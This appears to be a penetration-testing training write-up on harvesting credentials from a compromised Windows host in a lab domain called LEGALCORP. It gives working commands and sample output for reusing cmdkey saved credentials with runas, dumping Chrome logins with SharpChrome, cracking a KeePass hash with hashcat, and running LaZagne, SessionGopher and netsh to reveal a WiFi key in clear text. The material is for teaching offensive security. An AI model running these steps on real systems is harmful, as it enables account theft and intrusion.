Further Credential Theft

Cmdkey Saved Credentials

C:\xyz> cmdkey /list

    Target: LegacyGeneric:target=TERMSRV/SQL01
    Type: Generic
    User: LEGALCORP\bob

When we attempt to RDP to the host, the saved credentials will be used.

We can also attempt to reuse the credentials using runas to send ourselves a reverse shell as that user, run a binary, or launch a PowerShell or CMD console with a command such as:

PS C:\xyz> runas /savecred /user:LEGALCORP\bob "COMMAND HERE"

Browser Credentials

A tool such as SharpChrome can be used to retrieve cookies and saved logins from Google Chrome.

PS C:\xyz> .\SharpChrome.exe logins /unprotect

  __                 _
 (_  |_   _. ._ ._  /  |_  ._ _  ._ _   _
 __) | | (_| |  |_) \_ | | | (_) | | | (/_

[*] Action: Chrome Saved Logins Triage

[*] Triaging Chrome Logins for current user

[*] AES state key file : C:\Users\bob\AppData\Local\Google\Chrome\User Data\Local State
[*] AES state key      : 5A2BF178278C85E70F63C4CC6593C24D61C9E2D38683146F6201B32D5B767CA0

--- Chrome Credential (Path: C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data) ---

C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://vc01.legalcorp.local/,https://vc01.legalcorp.local/ui,4/12/2021 5:16:52 PM,13262735812597100,[email protected],Welcome1

Password Managers

Extracting KeePass Hash

python2.7 keepass2john.py lcorp_Help_Desk.kdbx 

neutron@kali[/kali]$ hashcat -m 13400 keepass_hash /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt

hashcat (v6.1.1) starting...


Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385



If we gain access to a domain-joined system in the context of a domain user with a Microsoft Exchange inbox, we can attempt to search the user's email for terms such as "pass," "creds," "credentials," etc. using MailSniper.


When all else fails, we can run the LaZagne tool in an attempt to retrieve credentials from a wide variety of software.

PS C:\xyz> .\lazagne.exe all

SessionGopher to extract saved PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP credentials. We need local admin access to retrieve stored session information for every user in HKEY_USERS, but it is always worth running as our current user to see if we can find any useful credentials.

PS C:\xyz> .\SessionGopher.ps1

PS C:\Tools> Invoke-SessionGopher -Target WINLPE-SRV01

         /  ".   SessionGopher
       ,"  _-"
     ,"   m m
  ..+     )      Brandon Arvanaghi
     `m..m       Twitter: @arvanaghi | arvanaghi.com

[+] Digging on WINLPE-SRV01...

Wifi Passwords

If we obtain local admin access to a user's workstation with a wireless card, we can list out any wireless networks they have recently connected to.

C:\xyz> netsh wlan show profile

Profiles on interface Wi-Fi:

Group policy profiles (read only)

User profiles
    All User Profile     : Smith Cabin
    All User Profile     : Bob's iPhone
    All User Profile     : EE_Guest
    All User Profile     : EE_Guest 2.4
    All User Profile     : lcorp_corp

Depending on the network configuration, we can retrieve the pre-shared key (Key Content below) and potentially access the target network.

C:\xyz> netsh wlan show profile lcorp_corp key=clear

Profile lcorp_corp on interface Wi-Fi:

Applied: All User Profile

Profile information
    Version                : 1
    Type                   : Wireless LAN
    Name                   : lcorp_corp
    Control options        :
        Connection mode    : Connect automatically
        Network broadcast  : Connect only if this network is broadcasting
        AutoSwitch         : Do not switch to other networks
        MAC Randomization  : Disabled

Connectivity settings
    Number of SSIDs        : 1
    SSID name              : "lcorp_corp"
    Network type           : Infrastructure
    Radio type             : [ Any Radio Type ]
    Vendor extension          : Not present

Security settings
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Authentication         : WPA2-Personal
    Cipher                 : GCMP
    Security key           : Present
    Key Content            : lcorpWIFI-CORP123908!